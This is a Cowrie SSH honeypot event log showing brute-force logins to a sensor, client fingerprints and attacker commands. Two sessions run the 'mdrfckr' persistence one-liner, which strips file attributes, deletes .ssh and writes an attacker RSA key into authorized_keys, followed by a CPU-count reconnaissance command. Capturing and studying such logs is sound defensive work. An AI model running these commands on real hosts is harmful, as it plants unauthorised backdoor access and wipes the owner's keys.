{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:30:32.088310Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:30:32.259425Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd2024","message":"login attempt [root/Passw0rd2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:30:32.953935Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:30:33.323403Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:30:33.324127Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:30:33.325315Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:30:33.501817Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:30:33.951490Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:30:33.952255Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:30:34.130198Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:30:34.131237Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":49556,"dst_ip":"1.2.3.4","dst_port":22,"session":"74387ed9822a","protocol":"ssh","message":"New connection: 103.206.72.2:49556 (1.2.3.4:22) [session: 74387ed9822a]","sensor":"my-vps","timestamp":"2025-09-08T20:30:34.304991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:30:34.308600Z","src_ip":"103.206.72.2","session":"74387ed9822a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:30:34.485882Z","src_ip":"103.206.72.2","session":"74387ed9822a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:30:35.195615Z","src_ip":"103.206.72.2","session":"74387ed9822a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:30:36.375545Z","src_ip":"103.206.72.2","session":"74387ed9822a"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":49560,"dst_ip":"1.2.3.4","dst_port":22,"session":"636f58606485","protocol":"ssh","message":"New connection: 103.206.72.2:49560 (1.2.3.4:22) [session: 636f58606485]","sensor":"my-vps","timestamp":"2025-09-08T20:30:36.547195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:30:36.553476Z","src_ip":"103.206.72.2","session":"636f58606485"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:30:36.724681Z","src_ip":"103.206.72.2","session":"636f58606485"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:30:37.417883Z","src_ip":"103.206.72.2","session":"636f58606485"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:30:37.591355Z","src_ip":"103.206.72.2","session":"af178931353e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:30:37.592489Z","src_ip":"103.206.72.2","session":"636f58606485"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60572,"dst_ip":"1.2.3.4","dst_port":22,"session":"d42e1fa701c6","protocol":"ssh","message":"New connection: 217.72.205.35:60572 (1.2.3.4:22) [session: d42e1fa701c6]","sensor":"my-vps","timestamp":"2025-09-08T20:30:45.183703Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:30:45.184763Z","src_ip":"217.72.205.35","session":"d42e1fa701c6"}
{"eventid":"cowrie.session.closed","duration":120.00509071350098,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:31:38.326005Z","src_ip":"212.227.235.229","session":"0fa643247826"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":42822,"dst_ip":"1.2.3.4","dst_port":22,"session":"d85fa5ba79f7","protocol":"ssh","message":"New connection: 103.206.72.2:42822 (1.2.3.4:22) [session: d85fa5ba79f7]","sensor":"my-vps","timestamp":"2025-09-08T20:31:51.631487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:31:51.632407Z","src_ip":"103.206.72.2","session":"d85fa5ba79f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:31:51.807717Z","src_ip":"103.206.72.2","session":"d85fa5ba79f7"}
{"eventid":"cowrie.login.failed","username":"edu","password":"Password","message":"login attempt [edu/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T20:31:52.539352Z","src_ip":"103.206.72.2","session":"d85fa5ba79f7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:31:53.717356Z","src_ip":"103.206.72.2","session":"d85fa5ba79f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48470,"dst_ip":"1.2.3.4","dst_port":22,"session":"41f869070164","protocol":"ssh","message":"New connection: 212.227.125.160:48470 (1.2.3.4:22) [session: 41f869070164]","sensor":"my-vps","timestamp":"2025-09-08T20:32:04.490485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:32:04.491487Z","src_ip":"212.227.125.160","session":"41f869070164"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T20:32:04.737965Z","src_ip":"212.227.125.160","session":"41f869070164"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":36190,"dst_ip":"1.2.3.4","dst_port":22,"session":"50b76c3905fc","protocol":"ssh","message":"New connection: 103.206.72.2:36190 (1.2.3.4:22) [session: 50b76c3905fc]","sensor":"my-vps","timestamp":"2025-09-08T20:33:09.906061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:33:09.909423Z","src_ip":"103.206.72.2","session":"50b76c3905fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:33:10.094582Z","src_ip":"103.206.72.2","session":"50b76c3905fc"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"1234","message":"login attempt [ftp2/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T20:33:10.830620Z","src_ip":"103.206.72.2","session":"50b76c3905fc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:33:12.022994Z","src_ip":"103.206.72.2","session":"50b76c3905fc"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":36416,"dst_ip":"1.2.3.4","dst_port":22,"session":"005718da97c7","protocol":"ssh","message":"New connection: 216.107.136.92:36416 (1.2.3.4:22) [session: 005718da97c7]","sensor":"my-vps","timestamp":"2025-09-08T20:33:56.931059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:33:56.931949Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:33:57.022068Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.login.success","username":"root","password":"xdr5tgb","message":"login attempt [root/xdr5tgb] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:33:57.425080Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:33:57.667385Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:33:57.668251Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:33:57.669975Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:33:57.761873Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:33:57.958950Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:33:57.959682Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:33:58.051682Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:33:58.052579Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:04.498700Z","src_ip":"212.227.125.160","session":"41f869070164"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:10.204314Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.205152Z","src_ip":"216.107.136.92","session":"005718da97c7"}
